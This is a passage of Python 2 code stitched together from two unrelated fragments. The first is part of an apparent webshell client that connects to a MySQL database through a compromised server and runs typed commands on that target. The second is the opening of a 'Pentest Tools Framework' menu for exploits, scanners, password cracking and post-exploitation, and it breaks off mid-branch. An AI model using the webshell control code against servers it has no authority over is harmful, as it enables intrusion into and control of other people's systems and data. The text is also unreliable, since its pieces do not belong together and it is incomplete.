"db" or context == "database": ip = raw_input("IP (127.0.0.1): ") or "127.0.0.1" username = raw_input("Username (root): ") or "root" password = raw_input("Password (root): ") or "root" Log.info("Creating connection by [%s:%s] to [%s]..." % (username, password, ip)) mysql_connection = Mysql(webshell, ip, username, password) if not mysql_connection.function: Log.error("The target server cannot support mysql!") continue if not mysql_connection.connection_flag: Log.error("Connection failed!") continue Log.success("Connection success!") if mysql_connection.function != "": Log.success("Entering database server interactive mode...") mysql_connection.interactive() else: Log.error("No supported database function!") elif context == "q" or context == "quit" or context == "exit": Log.info("Quiting...") break else: Log.error("Unsupported function!") if LOCAL_COMMAND_FLAG == True: Log.info("Executing command on localhost...") os.system(context_fresh) else: Log.info("Executing command on target server...") webshell.auto_exec_print(context_fresh)
import os,time,sys import core from time import sleep from ptf import * from core.exploit import clean from core.banner import banner,ptf # Set color R = '\033[31m' # Red N = '\033[1;37m' # White G = '\033[32m' # Green O = '\033[0;33m' # Orange B = '\033[1;34m' #Blue E = '\033[0m' # End if not os.geteuid() == 0:#Detected user root sys.exit("""\033[1;91m\n[!] Pentest Tools Framework run as root!!. \n\033[1;m""") if __name__ == "__main__" or clean() or banner() or ptf(): main() def main(): while True: try: PTF = raw_input("Pentest>> ") if PTF == 'use modules/exploits': core.menu.exploits() main() elif PTF == 'use modules/scanners': core.menu.scan() main() elif PTF =='use modules/password': core.menu.pas1() main() elif PTF == 'use modules/post':